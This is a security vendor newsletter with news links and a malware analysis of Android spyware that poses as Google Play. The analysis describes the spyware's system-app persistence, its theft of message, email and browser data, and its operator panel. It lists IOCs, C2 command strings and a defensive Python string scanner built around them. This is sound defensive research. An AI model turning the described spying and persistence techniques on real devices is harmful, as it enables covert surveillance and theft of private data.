
  • SonicWall CEO Bill Conner talks to Infosecurity Magazine about the wider implications of the Air Canada app data breach.

T-Mobile, Sprint both hit by Security Breaches ahead of Merger – MSSP Alert

  • In an article detailing the recent T-Mobile and Sprint security breaches ahead of the announced mega-merger, SonicWall’s Bill Conner is featured as a security expert providing perspective on the significance of these security breaches for companies.

Fortnite app for Android let hackers hijack players’ phones, Google warns – The Independent (UK)

  • SonicWall’s VP of Product Management Lawrence Pingree is featured providing commentary to the recent Fortnite vulnerability and the risk organizations face as Fortnite continues to grow.

Cyber Security News

The Untold Story of NotPetya, the Most Devastating Cyberattack in History – Wired

  • In 2017 a massive cyberattack caused billions of dollars of damage worldwide, including almost completely wiping out the systems of one of the biggest international shipping firms. This is the full story of NotPetya.

Artificial Intelligence Is Now a Pentagon Priority. Will Silicon Valley Help – New York Times

  • The Pentagon and Silicon Valley eye each other up and try to find a common ethical middle ground so they can work together.

ThreatList: Ransomware Attacks Down, Fileless Malware Up in 2018 – Threat Post

  • Cybercrime changes but never goes away.

Give yourselves a pat on the back, top million websites, half of you now use HTTPS – The Register

  • 51.8 percent of the top million websites ranked by Alexa are now using HTTPS, with a little help from Google Chrome and a shaming website.

How Mindfulness Can Help Prevent Hacks, and Four More Cybersecurity Tips – University of Virginia Today

  • This blog might be what you need if all this cybercrime news is getting you down.

In Case You Missed It

A long running Android spyware which targets social apps is still active

There are a number of commercial spyware products for Android devices that advertise themselves as “monitoring” apps for children or spouses. Such products have always been in a grey area because of the questionable activities they perform, but at least they advertise themselves as what they really are; there is no pretense about their purpose.

The problem arises when malware starts using similar features and infects a victim’s device, tearing it open for an attacker to spy on it and siphon off sensitive data. SonicWall Capture Labs Threat Research team observed malware apps with powerful spying capabilities actively spreading in the wild.

INSTALLATION AND INITIAL OBSERVATIONS
The malware uses the old Google Play logo, which is the first sign that something might be amiss. It then prompts the user with an input box for an email address; this should be a clear warning sign, because the official Google Play app shows no such prompt:

Upon execution the malware does something we did not expect: it runs a series of tests. We have not encountered anything like this in recent times:

The email entered by the user is used as an identifier for the infected device and is reported to the attacker:


MAKE ME A SYSTEM APP
The malware then tries to make itself a system application by copying its APK into the /system/app folder (which requires root, hence the rooting guide discussed below). The benefit of being a system app is that the user cannot remove it through the normal uninstall flow. This is a good persistence mechanism for malware: it stays on the device even if the victim realises what is going on and tries to remove it by conventional means:


INITIATING SPY MODE
During our analysis, the malware started its spy operation by attempting to steal sensitive information from the infected device. We have listed some of the functions based on different categories:

Device related data:

The malware has a component – named MessageSenderTask#work – that steals device-related information and sends it to the attacker:

Browser History:

This component – named BrowserHistoryReader#sendBrowserHistory – steals and sends the browser history. The collected data is first saved locally in a CSV file, which is uploaded at a later stage:

Databases of well known apps:

The malware looks for databases of well known apps, we have listed some of them based on their categories –

Chat/messenger apps – Blackberry BBM, WhatsApp, Line messenger, Skype, Viber

Email clients – Gmail, Hotmail, Outlook

Social media – Twitter, Facebook


WEAK SECURITY
A good security coding practice for any developer: whenever sensitive information is saved on a device, it should be well protected, because someone might misuse the locally saved data. Fortunately for us, the malware author did not follow this guideline.

As stated earlier, the malware registers the infected device with the server using the email address we entered. It also generates a password for the device and saves it locally. These credentials grant access to the dashboard for each infected device; we were able to log in using the data pertaining to our registered device:

All the spy related functions are present on the left side in the panel, results are shown on the right side:

Panel showing installed apps on our infected device:

It is also important to check whether a web application leaks sensitive information in its error messages. When we entered wrong credentials, the error message disclosed an email address, which is potentially the administrator account used to oversee all the infected devices via the panel:

DIGGING FURTHER
The malware we analyzed was communicating with pages on the domain movi333.com. While looking for more information about this domain we stumbled across a few resources hosted on it:

Premium.pdf

This is essentially an advertisement for this spyware; it highlights the different features and explains how to use each of them once a device is infected:

Steps on how to access the panel and description about all the spy functionalities:

They advise installing all the apps whose databases are targeted by the spyware; these apps are even hosted on their website in case a user wishes to circumvent Google Play:

root.pdf

This document talks about rooting Android devices and points to a few tools that can achieve root on a device:

Mail system of the domain:

One of the links on this domain led us to its mail system:

This is most likely set up for the users/customers of this spyware.

Advertisements, a good and easy-to-use UI for monitoring the infected devices and a mail system are all indications that this is a well-run operation. Some of the malicious APKs associated with this campaign are a little old (from 2014), but we found a number of APKs as new as July 2018. Coupled with the fact that the domain is still operational, this indicates that the spyware is most likely still in business.

The best way to stay protected against such spyware is to be vigilant about the apps installed on our devices.

SonicWall Capture Labs provides protection against this threat via the following signatures:

GAV: Tarambuka.SPY (Trojan)
GAV: Tarambuka.SPY_2 (Trojan)

APPENDIX

MD5 for the indicators of compromise (IOC):

  • 5e24febce239b795d8b65aec28c65616
  • 5607d106f33cd70de1cea968fcf642b4
  • 062afaa5ad37aa3b1da8b85939c05a66
  • 6203348069f7bbb23bdf98596bdd1edf
  • 1aa69ffb952a4a9044332dda432c9d06

The malware creates the following database table on the device – sms_logs –  and saves the following data

  • sms sender
  • sms recipient
  • sms body
  • sms type
  • time when the sms was sent/received

We observed the following hardcoded commands in the malware we analyzed:

  • PULLREQUEST_skypelog
  • PULLREQUEST_twitterlog
  • PULLREQUEST_vibermsg
  • PULLREQUEST_whatsapplog
  • PULLREQUEST_gmaillog
  • PULLREQUEST_hotmaillog
  • PULLREQUEST_linemessenger
  • PULLREQUEST_fblog
  • PULLREQUEST_fbmessenger
  • PULLREQUEST_bbmessenger
  • ACAPON/ACAPOFF
  • ACAPDAILYON/ACAPDAILYOFF
  • GPSNOW
  • APPSETTINGS
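The MD5 hashes above identify only the exact samples analyzed; the hardcoded command strings, the C2 domain, the /system/app persistence path and the sms_logs table survive repackaging and so make more durable indicators. The following Python script is an added example for this article, not SonicWall's GAV signature: it opens an APK as the zip it is, runs a substring scan over the dex, assets and native-library entries for the commands and indicators listed above, and returns a verdict that only becomes "likely-spyware" when several distinct C2 verbs co-occur. The APKs it scans are constructed in memory (a zip holding a stand-in classes.dex, not valid dex bytecode), so it runs offline.

```python
"""Scan an APK for the strings this writeup ties to the spyware: the hardcoded
C2 commands from the appendix, the C2 domain, the /system/app persistence path
and the sms_logs table. String IOCs survive repackaging that changes the MD5.

Added example for this article, not SonicWall's GAV signature. The APKs scanned
below are constructed in memory: a zip with a stand-in classes.dex, not real dex.
"""
import io
import re
import zipfile

# Hardcoded commands observed in the analysed sample (listed in the appendix above).
COMMANDS = frozenset({
    "PULLREQUEST_skypelog", "PULLREQUEST_twitterlog", "PULLREQUEST_vibermsg",
    "PULLREQUEST_whatsapplog", "PULLREQUEST_gmaillog", "PULLREQUEST_hotmaillog",
    "PULLREQUEST_linemessenger", "PULLREQUEST_fblog", "PULLREQUEST_fbmessenger",
    "PULLREQUEST_bbmessenger", "ACAPON", "ACAPOFF", "ACAPDAILYON", "ACAPDAILYOFF",
    "GPSNOW", "APPSETTINGS",
})

# Other strings the analysis associates with this family.
INDICATORS = frozenset({"movi333.com", "/system/app", "sms_logs",
                        "MessageSenderTask", "BrowserHistoryReader"})

# Entries worth string-scanning; resources and signature files are skipped.
SCAN_RE = re.compile(r"^(classes\d*\.dex|assets/.*|lib/.*)$")


def scan_apk(apk_bytes):
    """Return the matched commands and indicators plus a verdict for one APK."""
    cmds, inds = set(), set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            if not SCAN_RE.match(name):
                continue
            data = z.read(name)
            cmds.update(c for c in COMMANDS if c.encode() in data)
            inds.update(i for i in INDICATORS if i.encode() in data)
    # A single hit can be coincidental; several distinct C2 verbs are not.
    if len(cmds) >= 3:
        verdict = "likely-spyware"
    elif cmds or inds:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"commands": sorted(cmds), "indicators": sorted(inds), "verdict": verdict}


def build_sample_apk(strings):
    """Constructed stand-in for an APK: a zip whose classes.dex holds the given
    strings NUL-separated behind a dex magic. Enough for a string scan, nothing more."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")
        z.writestr("classes.dex",
                   b"dex\n035\x00" + b"\x00".join(s.encode() for s in strings) + b"\x00")
        z.writestr("res/values/strings.xml", b"<resources/>")
    return buf.getvalue()


# Constructed samples (not the real malware): one mimicking the family, one benign.
SPY_SAMPLE = build_sample_apk([
    "Lcom/example/MessageSenderTask;", "PULLREQUEST_whatsapplog",
    "PULLREQUEST_gmaillog", "GPSNOW", "ACAPON", "movi333.com", "/system/app", "sms_logs",
])
BENIGN_SAMPLE = build_sample_apk(["Lcom/example/MainActivity;", "onCreate", "Hello, world"])

if __name__ == "__main__":
    for label, apk in (("spy", SPY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_apk(apk))
```

On a real device the same scan can be run over APKs pulled with `adb pull`, and the /system/app directory deserves a look of its own, since a self-installed system app is exactly the persistence trick described above. A plain substring match is easy for the author to defeat by obfuscating strings, so treat this as triage rather than a replacement for the signatures listed above.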